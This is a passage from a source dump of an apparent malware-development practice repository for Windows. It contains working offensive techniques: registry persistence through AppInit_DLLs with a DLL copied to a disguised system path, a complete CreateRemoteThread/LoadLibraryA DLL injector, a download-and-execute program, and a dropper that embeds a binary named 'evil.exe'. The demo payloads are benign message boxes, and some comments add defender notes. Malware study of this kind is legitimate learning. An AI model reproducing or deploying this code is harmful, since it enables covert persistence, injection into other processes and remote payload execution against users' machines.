    regOpenResult2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey2, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey2);

    // Copy the DLL to a benign-looking path; the third argument (true) means
    // "fail if the file already exists", and the result is ignored
    const char path[] = "C:\\ProgramData\\Microsoft\\Network\\MSNetworkService.dll";
    CopyFile("testLibs.dll", path, true);
    DWORD data = 1;

    LPCSTR keyName1 = "Appinit_Dlls";
    SetStringValueKey(hKey1, keyName1, path);
    SetStringValueKey(hKey2, keyName1, path);

    LPCSTR keyName2 = "LoadAppInit_DLLs";
    SetDWORDValueKey(hKey1, keyName2, data);
    SetDWORDValueKey(hKey2, keyName2, data);

    RegCloseKey(hKey1);
    RegCloseKey(hKey2);

    MessageBox(NULL, "Hello!!", "Hellu!!", MB_OK);
#endif // Registry Modification

#if 0 // Registry set Default
    // Cleanup variant (compiled out): same keys, values reset to "" and 0
    HKEY hKey1, hKey2;
    long regOpenResult1, regOpenResult2;

    LPCTSTR lpSubKey1 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows";
    LPCTSTR lpSubKey2 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows";

    regOpenResult1 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey1, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey1);
    regOpenResult2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey2, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey2);

    DeleteFile("C:\\ProgramData\\Microsoft\\Network\\MSNetworkService.dll");
    DWORD data = 0;

    LPCSTR keyName1 = "Appinit_Dlls";
    SetStringValueKey(hKey1, keyName1, "");
    SetStringValueKey(hKey2, keyName1, "");

    LPCSTR keyName2 = "LoadAppInit_DLLs";
    SetDWORDValueKey(hKey1, keyName2, data);
    SetDWORDValueKey(hKey2, keyName2, data);

    RegCloseKey(hKey1);
    RegCloseKey(hKey2);

    MessageBox(NULL, "#_Funny!!", "#_Funny!!", MB_OK);
#endif // Registry set Default

    return 0;
}
--------------------------------------------------------------------------------
/process-injection/remote-dll-injection/dll-injection.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | /*
8 | ** Classic DLL Injection Via CreateRemoteThread And LoadLibrary
9 | ** Reference:
10 | ** [1] - https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
11 | ** [2] - https://github.com/Zer0Mem0ry/StandardInjection
12 | ** [3] - https://github.com/saeedirha/DLL-Injector
13 | ** [4] - https://attack.mitre.org/wiki/Technique/T1055
14 | */
15 |
16 | // Get The Process ID
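// Look up the PID of the first running process whose image name equals
// procname exactly (case-sensitive, e.g. "notepad.exe").
// Returns 0 when procname is NULL, the snapshot cannot be taken, or no
// process matches. The original returned whatever PID happened to be last
// in the enumeration when nothing matched — pointing the caller at an
// unrelated process — and leaked the snapshot handle on every call.
DWORD GetProcessID(const char* procname)
{
    PROCESSENTRY32 pe;
    HANDLE hSnap;
    DWORD pid = 0;

    if (procname == NULL)
        return 0;

    pe.dwSize = sizeof(PROCESSENTRY32);
    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (hSnap == INVALID_HANDLE_VALUE)
        return 0;

    if (Process32First(hSnap, &pe)) {
        do
        {
            if (strcmp(pe.szExeFile, procname) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnap, &pe));
    }
    CloseHandle(hSnap);
    return pid;
}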
33 |
// Entry point: classic DLL injection — writes the DLL path into the target
// process and starts a remote thread at kernel32!LoadLibraryA with that path
// as its argument, so the target's own loader maps the DLL. argc/argv are
// unused.
// Defender note: a CreateRemoteThread whose start address is LoadLibraryA in
// another process is one of the oldest and most widely detected injection
// signatures.
int main(int argc, char const *argv[])
{
    char strTmp[256], ProcessName[256], dllPathTmp[512];
    // Process running Input
    cout << "Example: crackme, basecalc,..." << endl;
    cout << "Enter Process Name: "; rewind(stdin);
    cin.getline(strTmp, sizeof(strTmp));
    // NOTE(review): strcat can overrun strTmp when the typed name is within
    // four characters of the buffer size.
    strcpy(ProcessName, strcat(strTmp, ".exe"));

    // DLL Path Input
    cout << "Enter DLL Path: ";
    cin.getline(dllPathTmp, sizeof(dllPathTmp));

    // Starting Injection
    cout << "[ Starting ] Classic Dll Injection Via Createremotethread And Loadlibrary" << endl;

    // DLL Path
    LPCSTR DllPath = dllPathTmp;

    // Open Target Proccess
    // NOTE(review): hProcess is never checked, so every call below silently
    // fails when it is NULL.
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetProcessID(ProcessName));

    // Allocate DllPath inside Target Proccess (+1 keeps the terminating NUL);
    // the result is not checked
    LPVOID pDllPath = VirtualAllocEx(hProcess, 0, strlen(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE);

    // Write DllPath into the memory address space allocated
    WriteProcessMemory(hProcess, pDllPath, (LPVOID)DllPath, strlen(DllPath) + 1, 0);

    // Create RemoteThread and call DLL — the local address of LoadLibraryA is
    // reused unchanged in the target process without being validated there
    HANDLE hLoadThread = CreateRemoteThread(hProcess, 0, 0,
        (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"),
        "LoadLibraryA"), pDllPath, 0, 0);

    // Loading: block until LoadLibraryA returns in the target
    // (hLoadThread is never closed)
    WaitForSingleObject(hLoadThread, INFINITE);

    // Allocated at
    cout << "[ OK ] Dll path allocated at: " << hex << pDllPath << endl;

    // Free the memory allocated for DllPath
    // NOTE(review): per the VirtualFreeEx documentation MEM_RELEASE expects a
    // size of 0, so this call fails as written; hProcess is never closed.
    VirtualFreeEx(hProcess, pDllPath, strlen(DllPath) + 1, MEM_RELEASE);

    cout << "[ OK ] Classic Dll Injection is Successful!!" << endl;
    cout << "[ EXIT ] Press any key to exit." << endl;

    getchar();
    return 0;
}
--------------------------------------------------------------------------------
/process-injection/test-lib/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/dllmain.cpp
--------------------------------------------------------------------------------
/process-injection/test-lib/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/stdafx.cpp
--------------------------------------------------------------------------------
/process-injection/test-lib/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/stdafx.h
--------------------------------------------------------------------------------
/process-injection/test-lib/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/targetver.h
--------------------------------------------------------------------------------
/process-injection/test-lib/testLibs.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-lib/testLibs.cpp
--------------------------------------------------------------------------------
/process-injection/test-messagebox/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/stdafx.cpp
--------------------------------------------------------------------------------
/process-injection/test-messagebox/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/stdafx.h
--------------------------------------------------------------------------------
/process-injection/test-messagebox/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/targetver.h
--------------------------------------------------------------------------------
/process-injection/test-messagebox/testMessageBox.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/process-injection/test-messagebox/testMessageBox.cpp
--------------------------------------------------------------------------------
/simple-dll/dll-no-export/dll-no-export.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-dll/dll-no-export/dll-no-export.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-dll/dll-no-export/dllmain.c:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include
3 | #pragma comment(lib, "User32.Lib")
4 |
/*
** DLL entry point: shows a message box once, when the library is first mapped
** into a process (DLL_PROCESS_ATTACH); every other notification is ignored and
** TRUE is always reported to the loader.
** Caveat: DllMain runs under the loader lock, and Microsoft's DllMain guidance
** advises against calling into user32 from it — the message box may fail or
** deadlock depending on the host process.
*/
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(0, "This is DllMain.", "Simple DLL", MB_OK | MB_ICONWARNING);
        break;
    default:
        break;
    }
    return TRUE;
}
12 |
13 | /*
14 | ** Visual Studio Configuration Precompiled Header
15 | ** Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
16 | ** => Removed header file and other files generated by VS. Keep only dllmain.cpp or dllmain.c
17 | */
--------------------------------------------------------------------------------
/simple-dll/dll-with-exported/dll-with-exported.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-dll/dll-with-exported/dll-with-exported.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-dll/dll-with-exported/dllmain.c:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include
3 | #include
4 | #include
5 | #pragma warning(disable : 4996)
6 | #pragma comment(lib, "User32.Lib")
7 |
8 | #define DllExport __declspec(dllexport)
9 |
/* Return a + b using plain int arithmetic (no overflow handling). */
int sum(int a, int b) {
    int total = a;
    total += b;
    return total;
}
13 |
/* Return a * b using plain int arithmetic (no overflow handling). */
int mul(int a, int b) {
    int product = a;
    product *= b;
    return product;
}
17 |
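/*
** Exported demo entry point: formats a short string (a * b via mul) and shows
** it in a message box. Takes no arguments and returns nothing.
** The only code change from the original is sprintf -> snprintf, so the
** fixed 50-byte buffer cannot be overrun if the text is edited later.
*/
DllExport void func() {
    char buffer[50] = { 0 };
    int a = 11, b = 9;
    /* Demo body; the author marks this as the spot where an exported
       function's real work would go */
    snprintf(buffer, sizeof(buffer), "This is func() exported.\n%d * %d = %d", a, b, mul(a, b));
    MessageBoxA(0, buffer, "func", MB_OK | MB_ICONWARNING);
}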
25 |
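/*
** DLL entry point. On DLL_PROCESS_ATTACH it formats a short string (a + b via
** sum) and shows it in a message box; every other notification is ignored and
** TRUE is always reported to the loader.
** The only code change from the original is sprintf -> snprintf, so the
** fixed 50-byte buffer cannot be overrun if the text is edited later.
** Caveat: DllMain runs under the loader lock, and Microsoft's DllMain guidance
** advises against calling into user32 from it — the message box may fail or
** deadlock depending on the host process.
*/
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        /* Demo body; the author marks this as the spot where a DLL's real
           work would go */
        char buffer[50] = { 0 };
        int a = 10, b = 9;
        snprintf(buffer, sizeof(buffer), "This is DllMain.\n%d + %d = %d", a, b, sum(a, b));
        MessageBoxA(0, buffer, "DllMain", MB_OK | MB_ICONWARNING);
    }
    return TRUE;
}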
37 |
38 | /*
39 | ** VS Project > Properties > C/C++ > All Option > Precompiled Header > Not Using ...
40 | ** VS Project > Properties > Linker > All Option > General Debug Info > No
41 | ** Removed header file and other files generated by VS. Keep only dllmain.cpp or dllmain.c
42 | ** Ref:
43 | ** 1. MSDN - dllexport, dllimport
44 | https://docs.microsoft.com/en-us/cpp/cpp/dllexport-dllimport
45 | */
46 |
--------------------------------------------------------------------------------
/simple-dll/release/x64/dll-no-export.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dll/release/x64/dll-no-export.zip
--------------------------------------------------------------------------------
/simple-dll/release/x64/dll-with-exported.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dll/release/x64/dll-with-exported.zip
--------------------------------------------------------------------------------
/simple-dll/simple-dll.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dll-no-export", "dll-no-export\dll-no-export.vcxproj", "{4691A5A1-0C3E-4D47-90C2-482181364CA7}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dll-with-exported", "dll-with-exported\dll-with-exported.vcxproj", "{5327F2AB-E9E0-4DA4-8183-31C0978B2921}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Debug|x64.ActiveCfg = Debug|x64
19 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Debug|x86.ActiveCfg = Debug|Win32
20 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x64.ActiveCfg = Release|x64
21 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x64.Build.0 = Release|x64
22 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x86.ActiveCfg = Release|Win32
23 | {4691A5A1-0C3E-4D47-90C2-482181364CA7}.Release|x86.Build.0 = Release|Win32
24 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Debug|x64.ActiveCfg = Debug|x64
25 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Debug|x86.ActiveCfg = Debug|Win32
26 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x64.ActiveCfg = Release|x64
27 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x64.Build.0 = Release|x64
28 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x86.ActiveCfg = Release|Win32
29 | {5327F2AB-E9E0-4DA4-8183-31C0978B2921}.Release|x86.Build.0 = Release|Win32
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {7D094A03-77EF-494B-B69E-DEDF283F1102}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------
/simple-downloader/release/x64/simple-downloader.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-downloader/release/x64/simple-downloader.zip
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "simple-downloader", "simple-downloader\simple-downloader.vcxproj", "{84567241-CBF3-4F80-947F-B819D01EFC11}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Debug|x64.ActiveCfg = Debug|x64
17 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Debug|x86.ActiveCfg = Debug|Win32
18 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x64.ActiveCfg = Release|x64
19 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x64.Build.0 = Release|x64
20 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x86.ActiveCfg = Release|Win32
21 | {84567241-CBF3-4F80-947F-B819D01EFC11}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {93053CBE-437D-496B-84F6-F30D3FDB21AD}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader/simple-downloader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "Urlmon.Lib")
6 | #pragma comment(lib, "User32.Lib")
7 | #pragma comment(lib, "shell32.lib")
8 |
9 |
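/*
 * Downloads a fixed URL into the current working directory and hands the
 * saved file to the shell's default handler. URLDownloadToFileW followed by
 * ShellExecuteW is the textbook download-and-execute sequence; the outbound
 * URL and the file written next to the process are the observables.
 *
 * Assumes a UNICODE build (TCHAR == WCHAR), otherwise the W-suffixed APIs
 * would not accept these buffers — the project settings are not visible here.
 *
 * Returns 0 after attempting the download (errors are printed, as in the
 * original) and 1 when the destination path cannot be built.
 */
int main()
{
    TCHAR url[] = TEXT("http://github.com/fluidicon.png");
    const TCHAR fileName[] = TEXT("\\fluidicon.png");
    TCHAR dirPath[MAX_PATH];
    TCHAR filePath[MAX_PATH];

    // Current working directory. Zero means failure; a value >= the buffer
    // size means the path did not fit and nothing usable was copied.
    DWORD dirLen = GetCurrentDirectoryW(MAX_PATH, dirPath);
    if (dirLen == 0 || dirLen >= MAX_PATH) {
        printf(" [-] Error! Could not get current directory.\n");
        return 1;
    }

    // Directory + "\\fluidicon.png" + NUL must fit in filePath. The original
    // formatted into filePath while passing filePath as the %s argument
    // (overlapping source/destination, undefined behaviour) and never bounded
    // the result.
    if (dirLen + (sizeof(fileName) / sizeof(fileName[0]) - 1) >= MAX_PATH) {
        printf(" [-] Error! Destination path too long.\n");
        return 1;
    }
    wsprintfW(filePath, TEXT("%s%s"), dirPath, fileName);

    // Download file from url
    HRESULT hRes = URLDownloadToFileW(NULL, url, filePath, 0, NULL);
    Sleep(400);

    // Print result
    if (hRes == S_OK) {
        printf(" [+] File download successfully.\n");
        Sleep(400);
        printf(" [+] Saved to: %ls\n", filePath);
        Sleep(400);
        printf(" [+] Executing file dropped..!");
        Sleep(400);

        // Open the downloaded file with its default handler. ShellExecute
        // reports failure through a pseudo-HINSTANCE value of 32 or less.
        HINSTANCE hInst = ShellExecuteW(NULL, L"open", filePath, NULL, NULL, SW_SHOWNORMAL);
        if ((INT_PTR)hInst <= 32) {
            printf("\n [-] ShellExecuteW failed. Code = %ld\n", (long)(INT_PTR)hInst);
        }
    }
    else if (hRes == E_OUTOFMEMORY) {
        printf(" [-] The buffer length is invalid.\n");
    }
    else if (hRes == INET_E_DOWNLOAD_FAILURE) {
        printf(" [-] The specified resource or callback interface was invalid.\n");
    }
    else {
        printf(" [-] Unknown Error!\n");
    }

    return 0;
}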
49 |
50 | /*
51 | ** Ref:
52 | ** 1. MSDN
53 | ** https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)
54 | ** 2. Should I use URLDownloadToFile?
55 | ** https://stackoverflow.com/a/5185008
56 | */
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader/simple-downloader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-downloader/simple-downloader/simple-downloader.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-dropper/release/x64/simple-dropper.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/release/x64/simple-dropper.zip
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "simple-dropper", "simple-dropper\simple-dropper.vcxproj", "{9DA0471C-75DF-43B3-B786-9E2A6FAD4377}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Debug|x64.ActiveCfg = Debug|x64
17 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Debug|x86.ActiveCfg = Debug|Win32
18 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x64.ActiveCfg = Release|x64
19 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x64.Build.0 = Release|x64
20 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x86.ActiveCfg = Release|Win32
21 | {9DA0471C-75DF-43B3-B786-9E2A6FAD4377}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {7885CE95-A1D5-4372-8D46-962DD1DE8B50}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/simple-dropper/bin/evil.exe
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/bin/fluidicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/simple-dropper/bin/fluidicon.png
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by simple-dropper.rc
4 | //
5 | #define IDR_BIN1 101
6 | #define IDB_PNG1 102
7 |
8 | // Next default values for new objects
9 | //
10 | #ifdef APSTUDIO_INVOKED
11 | #ifndef APSTUDIO_READONLY_SYMBOLS
12 | #define _APS_NEXT_RESOURCE_VALUE 103
13 | #define _APS_NEXT_COMMAND_VALUE 40001
14 | #define _APS_NEXT_CONTROL_VALUE 1001
15 | #define _APS_NEXT_SYMED_VALUE 101
16 | #endif
17 | #endif
18 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-dropper/simple-dropper/simple-dropper.aps
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 |
56 | /////////////////////////////////////////////////////////////////////////////
57 | //
58 | // PNG
59 | //
60 |
61 | IDB_PNG1 PNG "bin\\fluidicon.png"
62 |
63 | #endif // English (United States) resources
64 | /////////////////////////////////////////////////////////////////////////////
65 |
66 |
67 |
68 | #ifndef APSTUDIO_INVOKED
69 | /////////////////////////////////////////////////////////////////////////////
70 | //
71 | // Generated from the TEXTINCLUDE 3 resource.
72 | //
73 |
74 |
75 | /////////////////////////////////////////////////////////////////////////////
76 | #endif // not APSTUDIO_INVOKED
77 |
78 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/simple-dropper/simple-dropper/simple-dropper.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-encryption/release/x64/simple-encryption.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-encryption/release/x64/simple-encryption.zip
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
